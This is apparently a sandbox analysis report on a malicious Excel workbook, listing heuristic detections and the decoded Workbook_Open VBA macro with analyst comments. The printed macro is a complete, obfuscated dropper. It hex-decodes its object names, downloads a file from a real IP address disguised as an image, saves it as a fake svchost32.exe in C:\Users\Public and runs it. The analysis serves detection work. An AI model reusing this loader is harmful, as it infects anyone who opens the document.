MALICIOUS
188
Risk Score
Heuristics 5
-
VBA macros detected — severity: medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
VBA downloads and writes a file to disk — severity: critical — OLE_VBA_HTTP_DROP_EXEC: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths, this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script:
pphipenpjmmxjntrwlno.write bpermttejpxwkhdzdvds.responseBody -
Obfuscated auto-exec VBA loader — severity: critical — OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:
Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) -
CreateObject call — severity: high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) -
Workbook_Open macro — severity: low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Private Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 5ebd6f33ab467e73fedc8dc862313043d74a132e32cfab60652e88b65e6b2714) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4894 bytes |
Preview script — first 1,000 lines of the extracted script
' Module header for the ThisWorkbook document module (VB_Base GUID 00020819 is
' the Excel Workbook class). Attribute lines are stream metadata recovered by
' olevba, not executable statements; the auto-exec handler follows them.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-exec entry point: runs as soon as the workbook is opened with macros
' enabled. The whole download-drop-execute chain lives in this one handler;
' the only user interaction required is "Enable Content".
Private Sub Workbook_Open()
' Up to the first CreateObject the code is ordinary Excel formatting and
' AutoFill work (data bars, cell values). It modifies the sheet but takes no
' part in the download chain; it appears to act as benign cover around the
' payload statements interleaved below.
Range("E2:E9").Select
' All three objects are declared untyped (Variant) for late-bound COM use.
Dim bpermttejpxwkhdzdvds
Selection.FormatConditions.AddDatabar
Dim pphipenpjmmxjntrwlno
Selection.FormatConditions(Selection.FormatConditions.Count).ShowValue = True
Dim eiiufsjqvcpgjrsmhwci
Selection.FormatConditions(Selection.FormatConditions.Count).SetFirstPriority
With Selection.FormatConditions(1)
.MinPoint.Modify newtype:= xlConditionValueAutomaticMin
.MaxPoint.Modify newtype:= xlConditionValueAutomaticMax
End With
With Selection.FormatConditions(1).BarColor
.Color = 8700771
.TintAndShade = 0
End With
Selection.FormatConditions(1).BarFillType = xlDataBarFillGradient
Selection.FormatConditions(1).Direction = xlContext
Selection.FormatConditions(1).NegativeBarFormat.ColorType = xlDataBarColor
Selection.FormatConditions(1).BarBorder.Type = xlDataBarBorderSolid
Selection.FormatConditions(1).NegativeBarFormat.BorderColorType = _
xlDataBarColor
With Selection.FormatConditions(1).BarBorder.Color
.Color = 8700771
.TintAndShade = 0
End With
Selection.FormatConditions(1).AxisPosition = xlDataBarAxisAutomatic
With Selection.FormatConditions(1).AxisColor
.Color = 0
.TintAndShade = 0
End With
With Selection.FormatConditions(1).NegativeBarFormat.Color
.Color = 255
.TintAndShade = 0
End With
With Selection.FormatConditions(1).NegativeBarFormat.BorderColor
.Color = 255
.TintAndShade = 0
End With
Range("C2").Select
ActiveCell.FormulaR1C1 = "2"
Range("D2").Select
ActiveCell.FormulaR1C1 = "2"
Range("E2").Select
Application.CutCopyMode = False
ActiveCell.FormulaR1C1 = " = RC[-2]+RC[-1]"
Range("C2:E2").Select
Selection.AutoFill Destination:= Range("C2:E7"), Type:= xlFillDefault
Range("C2:E7").Select
Range("C7:E7").Select
Selection.AutoFill Destination:= Range("C7:E9"), Type:= xlFillDefault
Range("C7:E9").Select
Range("C9:E9").Select
Selection.AutoFill Destination:= Range("C9:E10"), Type:= xlFillDefault
Range("C9:E10").Select
Range("C10:E10").Select
Selection.AutoFill Destination:= Range("C10:E13"), Type:= xlFillDefault
Range("C10:E13").Select
' Each ProgID is stored as space-separated hex and decoded at runtime by
' fmcizyxudlguufmjjnaw (defined below), so no literal ProgID appears in the
' macro text. This one decodes to "Microsoft.XMLHTTP" (HTTP client).
Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
Range("D3").Select
' Decodes to "ADODB.Stream" (binary stream used to write the file).
Set pphipenpjmmxjntrwlno = CreateObject(fmcizyxudlguufmjjnaw("41 44 4f 44 42 2e 53 74 72 65 61 6d"))
ActiveCell.FormulaR1C1 = "5"
' Decodes to "WScript.Shell" (process launcher).
Set eiiufsjqvcpgjrsmhwci = CreateObject(fmcizyxudlguufmjjnaw("57 53 63 72 69 70 74 2e 53 68 65 6c 6c "))
Range("C4").Select
' Download URL. Decoded IoC: http://185.33.85.52/FR/BDO-1218.jpg — an
' IP-hosted path with an image extension, although the response body is
' saved and run as an executable below.
vwugwgoruhjzjfianlrf = fmcizyxudlguufmjjnaw("68 74 74 70 3A 2F 2F 31 38 35 2E 33 33 2E 38 35 2E 35 32 2F 46 52 2F 42 44 4F 2D 31 32 31 38 2E 6A 70 67")
ActiveCell.FormulaR1C1 = "1"
' Drop path. Decoded IoC: C:\Users\Public\svchost32.exe — a world-writable
' folder and a filename that mimics a system binary.
geuxdamwomcriooggncw = fmcizyxudlguufmjjnaw("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
Range("C5").Select
' Same hex as the drop path; reused as the command line to execute.
RUNCMD = fmcizyxudlguufmjjnaw("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
ActiveCell.FormulaR1C1 = "2"
' "GET" is split into three literals, presumably to defeat simple keyword
' scans. The third argument (False) makes the request synchronous.
bpermttejpxwkhdzdvds.Open "G" + "E" + "T", vwugwgoruhjzjfianlrf, False
Range("D6").Select
' Outbound HTTP from the Office process: first externally observable step.
bpermttejpxwkhdzdvds.send
ActiveCell.FormulaR1C1 = "5"
' Type 1 = adTypeBinary: the stream carries raw bytes rather than text.
pphipenpjmmxjntrwlno.Type = 1
Range("D7").Select
ActiveCell.FormulaR1C1 = "8"
pphipenpjmmxjntrwlno.Open
Range("C8").Select
' Copies the raw HTTP response into the stream.
pphipenpjmmxjntrwlno.write bpermttejpxwkhdzdvds.responseBody
ActiveCell.FormulaR1C1 = "6"
Range("C10").Select
ActiveCell.FormulaR1C1 = "2"
Range("D10").Select
' SaveToFile with option 2 (adSaveCreateOverWrite) writes the downloaded bytes
' to the drop path, replacing any existing file. An .exe written under
' C:\Users\Public by the Excel process is a strong detection point.
pphipenpjmmxjntrwlno.savetofile geuxdamwomcriooggncw, 2
' Executes the dropped file; expect it to appear as a child process of the
' Excel host process.
eiiufsjqvcpgjrsmhwci.Run RUNCMD
ActiveCell.FormulaR1C1 = "3"
Range("C11").Select
ActiveCell.FormulaR1C1 = "6"
Range("D12").Select
ActiveCell.FormulaR1C1 = "9"
Range("C12").Select
End Sub
' Hex-string decoder that hides the ProgIDs, URL and drop path used by
' Workbook_Open. Input is a run of two-digit hex byte values separated by a
' single character (a space in every call above), e.g. "4d 69 63" -> "Mic".
' Returns the decoded string, one character per hex pair; there is no input
' validation.
Public Function fmcizyxudlguufmjjnaw(ByVal yelhwsjcdgxzflhpeypp As String) As String
' One decoded character.
Dim mvbhcdhdgnsuwxriulhy As String
' Accumulated output.
Dim itoiapedszqakutklugw As String
' 1-based position of the current hex pair in the input.
Dim qtoptlxxoeoygcosgsgn As Long
' Step 3 = two hex digits plus the separator. The missing space before "Step"
' is likely an extraction/formatting artifact of the decoded source.
For qtoptlxxoeoygcosgsgn = 1 To Len(yelhwsjcdgxzflhpeypp)Step 3
' Builds an "&H.." literal for Val. Val strips blanks from its argument, so
' " & H" still parses as a hex prefix while keeping the literal "&H" token
' out of the source text.
mvbhcdhdgnsuwxriulhy = Chr$(Val(" & H" & Mid$(yelhwsjcdgxzflhpeypp, qtoptlxxoeoygcosgsgn, 2)))
itoiapedszqakutklugw = itoiapedszqakutklugw & mvbhcdhdgnsuwxriulhy
Next qtoptlxxoeoygcosgsgn
fmcizyxudlguufmjjnaw = itoiapedszqakutklugw
End Function
' Module header for the "Sheet 1" worksheet module (VB_Base GUID 00020820 is
' the Excel Worksheet class). No procedures follow it in this preview; the
' active code is entirely in ThisWorkbook above.
Attribute VB_Name = "Sheet 1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||